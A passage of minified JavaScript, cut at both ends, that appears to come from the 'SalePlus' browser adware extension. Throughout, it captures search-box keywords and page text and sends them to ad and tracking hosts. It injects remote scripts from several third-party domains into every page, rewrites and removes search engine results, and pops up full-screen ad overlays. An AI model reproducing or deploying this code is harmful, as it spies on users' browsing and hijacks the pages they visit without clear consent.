c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling): a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k[b]))return k[b];return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault? b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var n=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts[b].selector),\"undefined\"!==typeof a.element){a.insert=a.inserts[b].at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left=!1;var d=b.get_ad_dom(a);(function(a,c){c&&c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(var e=0;e<b.num_of_items_in_one&&0!=c.length;e++){var f=b.get_item_json(a,c[0]);try{b.insert_point.children.push(f)}catch(g){b.insert_point= d,b.insert_point.children.push(f)}\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()}};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(n);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g= 0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;n=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.addExtensionName=function(a){var c=JSON.stringify(a.layouts.dom);if(!c.match(/\\[##eid##\\]/))return a;c=c.replace(/\\[##eid##\\]/g,b.eid);a.layouts.dom=JSON.parse(c);return a};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&& b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a=b.addExtensionName(a)}catch(e){}try{a.node=b.create_search(a)}catch(f){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig,\"_href=\")}},20)}, !1,a[c],!0)};b.addCloseFunctionality=function(){function a(a){for(var b=a.className.split(\" \"),c=0;c<b.length;c++)if(\"yael\"===b[c])return a;if(!a.parentElement)return!1;a=a.parentElement;return arguments.callee(a)}var c=b.utils.query_selector_all(\".yael_close_btn\");if(c)for(var d=0;d<c.length;d++)b.events.add(\"click\",function(){try{var b=a(this)}catch(c){}b&&b.parentElement.removeChild(b)},!1,c[d],\"closeBtn\")};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl, b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick();b.addCloseFunctionality();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href, b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(), !1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]); b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler(c),__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+ \"&hid=8438959027574575270&eid=1307&pid=21153&prid=186\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){\"\"!= a&&(window.__yael_res=JSON.parse(a),window.__yael_res.config.targets.header.num_of_items_in_one&&(b.num_of_items_in_one=window.__yael_res.config.targets.header.num_of_items_in_one),\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler(c),__yael.inject_search()))})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1, b.inputElement,!1)}};}catch(e){};try{new function(){if(!(document.getElementById(\"sdjksjsksjdskjd__0\")||window.self!=window.top||-1<location.host.indexOf(\"google.com\")||-1<location.host.indexOf(\"bing.com\")||-1<location.host.indexOf(\"yahoo.com\"))){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.setAttribute(\"id\",\"sdjksjsksjdskjd__0\");a.src=\"//cdncache-a.akamaihd.net/loaders/1750/l.js?aoi=1311798366&pid=1750&zoneid=21915789&ext=SalePlus&systemid=8438959027574575270&ext=SalePlus\";document.getElementsByTagName(\"head\")[0].appendChild(a)}};}catch(e){};try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4450fm\")&&window.self==window.top&&\"http:\"==window.self.location.protocol){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.eshopcomp.com/fo/min/wp.js?subid=1307_21153&hid=8438959027574575270&bname=SalePlus\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4450fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};}catch(e){};try{try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.eshopcomp.com/fo/ec/wpnewbs.js?subid=1307_21153&hid=8438959027574575270&bname=SalePlus\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};}catch(e){};try{if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1748/l.js?aoi=1311798366&pid=1748&zoneid=21915789&ext=SalePlus&systemid=8438959027574575270&ext=SalePlus\";document.getElementsByTagName(\"head\")[0].appendChild(script)};}catch(e){};try{if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1749/l.js?aoi=1311798366&pid=1749&zoneid=21915789&ext=SalePlus&systemid=8438959027574575270&ext=SalePlus\";document.getElementsByTagName(\"head\")[0].appendChild(script)};}catch(e){};try{try{new function(){if(null==document.getElementById(\"id_ad5cbe0b719874f1\")&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.eshopcomp.com/fo/min/wpgb.js?bname=SalePlus&subid=1307_21153\";a.setAttribute(\"id\",\"id_ad5cbe0b719874f1\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};}catch(e){};try{new function(){if(!document.getElementById('__if72ru4sdfsdfrkjahiuyi_once')){(function(){var c=document.createElement('div');c.id='__if72ru4sdfsdfrkjahiuyi_once';c.setAttribute('style','display:none;');var b=document.getElementsByTagName('body')[0];b&&b.appendChild(c)})();var a=this,d=a;a.hid='8438959027574575270';a.eid='1307';a.pid='21153';a.cc='FR';a.extName='SalePlus';a.OnloadCap=0;a.utils=new function(){var c=this;c.JSON=new function(){this.parse= function(b){try{return'undefined'!==typeof JSON&&'function'==typeof JSON.stringify?JSON.parse(b):eval('var a='+b)}catch(f){return!1}}};c.cookie=new function(){var b=this;b.setCookie=function(b,c,e){if(e){var a=new Date;a.setTime(a.getTime()+864E5*e);e='; expires='+a.toGMTString()}else e='';document.cookie=b+'='+c+e+'; path=/'};b.getCookie=function(b){b+='=';for(var c=document.cookie.split(';'),e=0;e<c.length;e++){for(var a=c[e];' '==a.charAt(0);)a=a.substring(1,a.length);if(0==a.indexOf(b))return a.substring(b.length, a.length)}return null};b.eraseCookie=function(f){b.setCookie(f,'',-1)}};c.getProtocol=function(b){var f=document.createElement('a');f.href=b;return f.protocol};c.getInstructions=function(b,f){c.msie&&11>c.msie?c.inject_script(b+('&cb='+d.prefix+'.'+f)):c.ajax.get(b,function(b){if(b)d[f](b)})};c.l=new function(){var b=this;b.xlat='abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/';b.encode=function(f){f=b._utf8_encode(f);for(var c='',e=0;e<f.length;){var a=f.charCodeAt(e++),d=f.charCodeAt(e++), m=f.charCodeAt(e++),k=a>>2,a=(a&3)<<4|d>>4,p=(d&15)<<2|m>>6,n=m&63;isNaN(d)?p=n=64:isNaN(m)&&(n=64);c=c+b.xlat.charAt(k)+b.xlat.charAt(a)+(64==p?'=':b.xlat.charAt(p))+(64==n?'=':b.xlat.charAt(n))}return c};b._utf8_encode=function(b){if(b&&b.length){for(var c='',a=0;a<b.length;a++){var d=b.charCodeAt(a);128>d?c+=String.fromCharCode(d):(127<d&&2048>d?c+=String.fromCharCode(d>>6|192):(c+=String.fromCharCode(d>>12|224),c+=String.fromCharCode(d>>6&63|128)),c+=String.fromCharCode(d&63|128))}return c}return b}; b.decode=function(b){b=b.toString().replace(/[^A-Za-z0-9\\+\\/]/g,'');for(var c='',a=0;a<b.length;){var d=this.xlat.indexOf(b.charAt(a++)),h=this.xlat.indexOf(b.charAt(a++)),m=this.xlat.indexOf(b.charAt(a++)),k=this.xlat.indexOf(b.charAt(a++)),p=(h&15)<<4|m>>2,n=(m&3)<<6|k,c=c+String.fromCharCode(d<<2|h>>4);64!=m&&0<p&&(c+=String.fromCharCode(p));64!=k&&0<n&&(c+=String.fromCharCode(n))}return this._utf8_decode(c)};b._utf8_decode=function(b){for(var c='',a=0;a<b.length;){var d=b.charCodeAt(a);if(128> d)c+=String.fromCharCode(d),a++;else if(191<d&&224>d)var h=b.charCodeAt(a+1),c=c+String.fromCharCode((d&31)<<6|h&63),a=a+2;else var h=b.charCodeAt(a+1),m=b.charCodeAt(a+2),c=c+String.fromCharCode((d&15)<<12|(h&63)<<6|m&63),a=a+3}return c}};c.ajax=new function(){this.get=function(b,c){try{var a=new XMLHttpRequest;a.open('GET',b,!0);a.withCredentials=!0;a.onreadystatechange=function(){4==a.readyState&&c(a.responseText)};a.send()}catch(e){}}};c.randomChar=function(){for(var b='',c=0;2>c;c++)b+='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'.charAt(Math.floor(52* Math.random()));return b};c.msie=function(){var b=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(b)&&(b=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(b)?!1:b}();c.inject_script=function(b){var c=document.getElementsByTagName('body')[0],a=document.createElement('script');a.type='text/javascript';a.id='id_'+d.prefix;a.src=b;c&&c.appendChild(a)};c.epoch=function(){return Math.floor((new Date).getTime()/1E3)};c.getVert= function(){var b=localStorage.getItem('sk398erjds2d');return b?b:c.forexVert()};c.browser=function(){var b=navigator.userAgent.toLowerCase(),c={webkit:/webkit/.test(b),mozilla:/mozilla/.test(b)&&!/(compatible|webkit)/.test(b),chrome:/chrome/.test(b),msie:/msie/.test(b)&&!/opera/.test(b),firefox:/firefox/.test(b),safari:/safari/.test(b)&&!/chrome/.test(b),opera:/opera/.test(b)};c.version=c.safari?(b.match(/.+(?:ri)[\\/: ]([\\d.]+)/)||[])[1]:(b.match(/.+(?:ox|me|ra|ie)[\\/: ]([\\d.]+)/)||[])[1];return c}(); c.getNodeTextProp=function(b){return'textContent'in b?'textContent':'innerText'in b?'innerText':!1};c.dhtml_prop_name=function(b){return b.replace(/(\\-([a-z]){1})/g,function(b,c,a){return a.toUpperCase()})};c.get_computed_style='function'!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(a){'float'==a&&(a='styleFloat');a=c.dhtml_prop_name(a);return'object'==typeof b.currentStyle&&null!=b.currentStyle&&'undefined'!=typeof b.currentStyle[a]?b.currentStyle[a]:null}}}:function(b, c){return window.getComputedStyle(b,c)||{getPropertyValue:function(){}}};c.mapAdTypes=function(b){for(var c={},a=0;a<b.length;a++){var e=b[a];c['_'+e[2]]={key:e[0]+'x'+e[1]}}return c}};a.prefix='if72ru4rkjahiuyi';a.version='0.1.0';a.pop_collision_id='__ipu=';a.pixelHostname='//direct_pop.winnering.net/';a.fallbackHostnames=['compey.net','comprises.info'];a.fallbackAdTypes={_1:{key:'728x90'},_2:{key:'300x250'},_3:{key:'468x60'},_4:{key:'250x250'},_5:{key:'160x600'},_6:{key:'120x600'},_7:{key:'120x240'}, _8:{key:'240x400'},_10:{key:'300x600'},_9:{key:'1024x728'},_11:{key:'670x670'},_12:{key:'600x270'},_13:{key:'600x400'}};try{a.stngs=a.utils.JSON.parse('{\"szy_domain\":[\"versemasteryx.info\",\"compey.info\"],\"ad_sizes\":[[120,60,19],[630,250,22],[336,280,17],[630,500,23],[180,150,18],[234,60,15],[200,200,16],[600,400,13],[125,125,14],[670,670,11],[600,270,12],[800,600,21],[468,60,3],[800,440,20],[300,250,2],[728,90,1],[300,600,10],[120,240,7],[120,600,6],[160,600,5],[250,250,4],[240,400,8]]}')}catch(r){a.stngs=a.utils.JSON.parse('{\"szy_domain\":[\"skymetwebguard.com\",\"compey.info\"],\"ad_sizes\":[[728,90,1],[300,250,2],[468,60,3],[250,250,4],[160,600,5],[120,600,6],[120,240,7],[240,400,8],[300,600,10],[670,670,11],[600,270,12],[600,400,13],[125,125,14],[234,60,15],[200,200,16],[336,280,17],[180,150,18],[120,60,19],[800,440,20],[800,600,21]]}')}var q; q=''!==a.stngs&&a.stngs&&'undefined'!==typeof a.stngs.szy_domain&&a.stngs.szy_domain instanceof Array?a.stngs.szy_domain:a.fallbackHostnames;a.hostnames=q;q=''!==a.stngs&&a.stngs&&'undefined'!==typeof a.stngs.ad_sizes&&a.stngs.ad_sizes instanceof Array?a.utils.mapAdTypes(a.stngs.ad_sizes):a.fallbackAdTypes;a.adTypes=q;a.body=document.getElementsByTagName('body')[0];a.directParams={subid:d.pid,subid1:d.hid,subid2:d.eid,tid:'6'};a.dom=new function(){this.json_to_html=function(c,b){if('#text'==c.type)b= document.createTextNode(c.text);else if('#comment'!=c.type){b||(b=document.createElement(c.type));if(c.attrs){for(var a in c.attrs)if(c.attrs.hasOwnProperty(a))if('style'==a&&c.attrs.style instanceof Object)for(var g in c.attrs.style){var e=d.utils.dhtml_prop_name(g);try{b.style[e]=c.attrs.style[g]}catch(l){}}else b.setAttribute(a,c.attrs[a]);'iframe'==c.type&&(c.attrs.hasOwnProperty('frameborder')&&(b.frameBorder=c.attrs.frameborder),c.attrs.hasOwnProperty('marginwidth')&&(b.marginWidth=c.attrs.marginwidth), c.attrs.hasOwnProperty('marginheight')&&(b.marginHeight=c.attrs.marginheight))}if(c.children)for(a=0;a<c.children.length;a++){e=c.children[a];g=arguments.callee(e);try{b.appendChild(g)}catch(h){if('#text'==e.type&&'string'==typeof e.text)if('style'==c.type&&b.styleSheet)b.styleSheet.cssText=e.text||'';else if(g=d.utils.getNodeTextProp(b))b[g]=e.text}}}return b}};a.events=new function(){var c=this;c.cache=[];c.add=window.addEventListener?function(b,a,d,e,l){'undefined'==typeof e&&(e=window);e.addEventListener(b, a,d);l&&c.cache.push([b,a,d,e])}:window.attachEvent?function(b,a,d,e,l){'undefined'==typeof e&&(e=window);e['e'+b+a]=a;e[b+a]=function(){e['e'+b+a](window.event)};e.attachEvent('on'+b,e[b+a]);l&&c.cache.push([b,a,d,e])}:function(){};c.remove=window.removeEventListener?function(b,a,c,e){'undefined'==typeof e&&(e=window);e.removeEventListener(b,a,c)}:window.detachEvent?function(b,a,c,e){'undefined'==typeof e&&(e=window);e.detachEvent('on'+b,e[b+a]);e[b+a]=null;e['e'+b+a]=null}:function(){};c.flush= function(){for(var a=0;a<c.cache.length;a++)c.remove.apply(c,c.cache[a]);c.cache=[]}};a.pixel=function(c,b){var f=a.pixelHostname+'?',g=d.hostnames['https:'==window.self.location.protocol?0:1],g={pid:d.pid,cc:d.cc,eid:d.eid,hid:d.hid,v:d.version,ch:b,cid:d.response[0][2],tid:d.directParams.tid,adtid:d.response[0][4],smid:d.response[0][3],pbid:c,oh:encodeURIComponent(d.response[0][0]),sh:encodeURIComponent(g)},e;for(e in g)f+=e+'='+g[e]+'&';f=f.slice(0,-1);(new Image).src=f};a.products=new function(){this.code_7= function(a){function b(){var a=document.getElementById('__modal_close'),b=document.getElementById('__modal_container');d.events.add('click',function(){b.parentNode.removeChild(b)},!1,a,!1)}function f(){var a,b,c;'undefined'==typeof d.response[0][4]&&d.response[0].push(9);try{a=d.adTypes['_'+d.response[0][4]].key,b=a.split('x')[0]+'px',c=a.split('x')[1]+'px'}catch(e){}a=window.innerHeight;if(b&&c){var f=document.getElementById('__modal');f.style.width=b;f.style.height=c;f.style.marginLeft=parseInt(f.style.width)/ 2-parseInt(f.style.width)+'px';f.style.top=(a-parseInt(f.style.height))/2+'px'}}if((a=a[0][0])&&window.self.location.protocol===d.utils.getProtocol(a)&&!(d.utils.msie&&9>d.utils.msie)&&'http:'===a.split('/')[0]){var g={type:'div',attrs:{id:'__modal_container',style:{position:'fixed','z-index':'9999999999',height:'100%',width:'100%',margin:'0',padding:'0',background:'rgba(0,0,0,0.3)',top:'0',right:'0',bottom:'0',left:'0','border-radius':'0'}},children:[{type:'div',attrs:{id:'__modal',style:{position:'absolute', 'z-index':'99999999999',left:'50%',top:'10px','text-align':'left',width:'90%',margin:'0 0 0 -45%','background-color':'#FFFFFF',border:'1px solid #DDDDDD','border-radius':'5px',height:'90%',padding:'0'}},children:[{type:'div',attrs:{style:{margin:'0',padding:'2px',left:'0',width:'inherit',top:'0','background-color':'transparent'},id:'__modal_close'},children:[{type:'img',attrs:{src:'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABYAAAAWCAYAAADEtGw7AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAABA1JREFUeNp8VW9IW1cUP3l5eS9iZx+amsaNtNZsdtgttnSkBYmRLEsVs1rwi9Z9Udm6YZXYTr+MaMcm4idXPwTUD05BWP3bNBsleREUoabMTzr/wNxEjQqCgoj/Gr2792re8prUC4f3znnn/M65757zuwqEEMRbLMfxXzocV/MLCswfZ2bakpKSTAqFAra3t4ML//zr93pfjL3weOb29vYO4gIQ4GjBwWx1dbVlfn5e3NjYQBHBOpqamkLRtoWFBfEh9mUYhn0bR6ZotTrB5/O5SNDq6irq6OhAxcXFSK1Wy8Rms6G2tja0vLxME4iBgEt78aIQF1in0wnT09Nu4uj1epHRaEQ8z8eARovJZELj4+ORHbk/0OsFGTCLV2BkhFba1dUlBUYDn5WkpaWFggeDQRfHq1kJ2NXQaIlUelaFZ0l7ezsF/7mpyUKBNamp/NLSkogFZWVlyZytVivKz8+PATEYDKimpgZd0GolW9L582h2dhatra2JaWlpPNR+/9hIMrndbllwTk6OdPrNzc3UlpCQgLKzsykAsXd2dspinE4ntT958qORseZZzaTthoeHZS2I+xX29/epXlFRAY2NjYB3BL29vaDRaKh9Z2dHiiE9PjA0BMfHx3Dnjt0MoVDIs7i4GPe/lZaWopWVFaly4hd57+/vjxszMTGB1tfXPYxKpTJtbm7GDA1Zg4ODUFdXB4eHh1RPTEykz9HRUSgrK4s7cBgUlEqliSFbODo6kn0ktsjC0wW7u7uy78QWb0VjMViCycnJcR0/NRqhu7sbBEGgeiSovLwcGhoaqB4th+EwpKSkEJcgg8fSjwkGMjIyZKDJ2KEHg0aSku0/dNbCwcEJ51RWVkJ1TS28OQZ4g/OF8fMIi/7SJdja2vIzflEcI44Oh0MG/Mm1azLQkpISGHjWB85HjyXwz25eP/0H+Fzwo6joLrx37hw8/8M3Btdv3ODxKYuEvTSp2pi+rK+vp+/4kBEoT8RssZIJQ+kfZlJdgckNFCr00ucnHSMab97iaQf82tNDR7q1tfWdI0uAFcr/wRklhxiGk/QH335H27BvYMgiccXly+ks7mdKQlVVVTGgfIIasbRiVgIiVSpZkoxDn9vtmGbXSc+7dPp0Vkablrw8AQNT2mzC25RAsXBYlKqTKiPgzGmCr795gFZCIVKt2154V4hL9F/Y7QLJSsAnJycRHmWkuZCKOBWumFTHnACSX1J07x4KBEbo9jHxuAqLimVEr3j7zku/coV9+svTnNu3b/2AVSuZOsx8MDMzg09eAQbDR6DXv09PH6/Aq9d//uSsfTT+99xfYdmwvOsyzc3N5e/f/+pqYWGBmeM4GzaZTj8Fw+Gwf9Dz+9hvz/rmRsWXcS/T/wQYAL8KChTqW9Z8AAAAAElFTkSuQmCC', style:{cursor:'pointer'}}},{type:'span',attrs:{style:{position:'relative','margin-left':'20px','font-size':'12px','line-height':'33px'}},children:[{type:'#text',text:'Ads by '+d.extName}]}]},{type:'iframe',attrs:{style:{border:'0'},id:'__modal_iframe',width:'100%',height:'100%',frameboarder:'0',scrolling:'yes',marginheight:'0',marginwidth:'0',allowtransparency:'true',src:''}}]}]};try{var e=d.dom.json_to_html(g)}catch(l){}e&&(document.getElementsByTagName('body')[0].appendChild(e),document.getElementById('__modal_iframe').src= a,d.pixel('0','1'),b(),f())}}};a.getKeywords=function(){var a=document.title,b=document.getElementsByTagName('meta');if(b)for(var d=0,g=b.length;d<g;d++)'keywords'!=b[d].name.toLowerCase()&&'description'!=b[d].name.toLowerCase()||(a+=' '+b[d].content.replace(/,/g,' '));if(d=document.getElementsByTagName('a')){b={};for(g=0;g<d.length;g++)try{var e=d[g].innerText;'undefined'==typeof e&&(e=d[g].textContent);for(var l=e.toLowerCase().split(/[\\s,-]/g),h=0;h<l.length;h++)4>l[h].length||(b[l[h]]?b[l[h]]++: b[l[h]]=1)}catch(m){}var e=[],k;for(k in b)e.push([k,b[k]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(k=0;k<e.length;k++)a+=' '+e[k][0]}return a.replace(/[_-]/g,' ').substring(0,1024)};a.injectComplianceBanner=function(){var c=document.getElementsByTagName('body')[0];if(0!=c.children.length){var b=document.createElement('div');b.id='cmsie';var d='<span style=\"font: xx-small;color: rgb(153, 153, 153);height: 15px;  font-family: Tahoma;font-size: 8px;padding-right: 22px;padding-top: 1px;float: right;  top: 2px;  text-decoration: none;line-height: 15px;\">Ad by '+ a.extName+'</span>';b.setAttribute('style','height: 15px;position: relative;background-color: #F9F9F9;border: none;border-radius:0');b.innerHTML=d;c.insertBefore(b,c.children[0])}};a.prepareUrl=function(){var c='?',b;for(b in d.directParams)c+=b+'='+d.directParams[b]+'&';c+='k='+encodeURIComponent(d.getKeywords());return'//'+a.hostnames['http:'==window.self.location.protocol?0:1]+c};a.tp=function(c){if(c){c=a.utils.l.decode(c);try{a.response=eval(c)}catch(b){}if(a.response&&a.response[0]&&(a.response[0][0]= a.response[0][0].replace('zig_pp','rHwKrHCKrTrEvTYEfHw9rTY7qjkHqHY%3D'),c=a.response[0][3],c=7,7===c&&'function'==typeof a.products['code_'+c]))a.products['code_'+c](a.response)}};a.getInstructions=function(c){var b='&cb='+a.prefix+'.tp';a.utils.msie?a.utils.inject_script(c+b):a.utils.ajax.get(c,function(b){b&&a.tp(b)})};a.initPop=function(){if(-1!==window.location.href.indexOf(a.pop_collision_id))return a.injectComplianceBanner();var c=a.prepareUrl();d.utils.getInstructions(c,'tp')};a.injectOnload=function(){'complete'=== document.readyState||10<a.OnloadCap?a.initPop():setTimeout(function(){a.OnloadCap++;a.injectOnload()},200)};d.utils.msie&&9>d.utils.msie||(window.self==window.top&&(a.utils.msie?a.injectOnload():a.initPop()),'undefined'==typeof window[a.prefix]&&(window[a.prefix]=a))}};}catch(e){};try{try{new function(){if(null==document.getElementById(\"id_a02b170eff6bb769\")&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//cjs.linkbolic.com/scjs/cjs/ctxjs.js?aff_id=1151&subaff_id=1307_21153&sbrand=SalePlus\";a.setAttribute(\"id\",\"id_a02b170eff6bb769\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};}catch(e){};try{window.self==window.top&&new function(){var a=this;a.sleepTime=5E3;a.setProductPriority={Foxy:1,iRobinHood:2};a.Foxy=new function(){this.init=function(){if(!document.getElementById(\"dotm495nvh5s99iez741dx4\")&&window.self==window.top){var c=document.createElement(\"script\");c.type=\"text/javascript\";c.setAttribute(\"id\",\"dotm495nvh5s99iez741dx4\");c.src=\"//client.foxydeal.com/sf/1054/1307X21153/\"+document.location.hostname+\"?partnerName=SalePlus\";document.getElementsByTagName(\"head\")[0].appendChild(c)}setTimeout(function(){null==\r\ndocument.getElementById(\"FoxyDealTopBar\")&&a.runProduct()},a.sleepTime)}};a.iRobinHood=new function(){this.init=function(){if(!document.getElementById(\"djdnjh4e7dne543gv\")&&window.self==window.top){var c=function(){window._chch3e7xjxs2=\"8438959027574575270\"};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))c();else{var b=document.createElement(\"script\");b.innerHTML=\"(\"+c.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild(b)}b=document.createElement(\"script\");b.type=\"text/javascript\";\r\nb.setAttribute(\"id\",\"djdnjh4e7dne543gv\");b.src=\"//static.donation-tools.org/widgets/WPPartner/widget.js?_irh_prodname=SalePlus&_irh_subid=1307_21153\";document.getElementsByTagName(\"head\")[0].appendChild(b)}setTimeout(function(){null==document.getElementById(\"iRobinhood_Strip\")&&a.runProduct()},a.sleepTime)}};a.sortedProduct=[];for(var b in a.setProductPriority)a.min||(a.min=a.setProductPriority[b]),a.max||(a.max=a.setProductPriority[b]),a.min>a.setProductPriority[b]&&\r\n(a.min=a.setProductPriority[b]),a.max<a.setProductPriority[b]&&(a.max=a.setProductPriority[b]);a.index=a.min;for(b in a.setProductPriority){for(var d in a.setProductPriority)a.index==a.setProductPriority[d]&&a.sortedProduct.push(d);a.index++}a.runProduct=function(){if(0<a.sortedProduct.length){var b=a.sortedProduct[0];a.sortedProduct.splice(0,1);a[b].init()}};a.runProduct()};}catch(e){}})();(function(){try{new function(){var 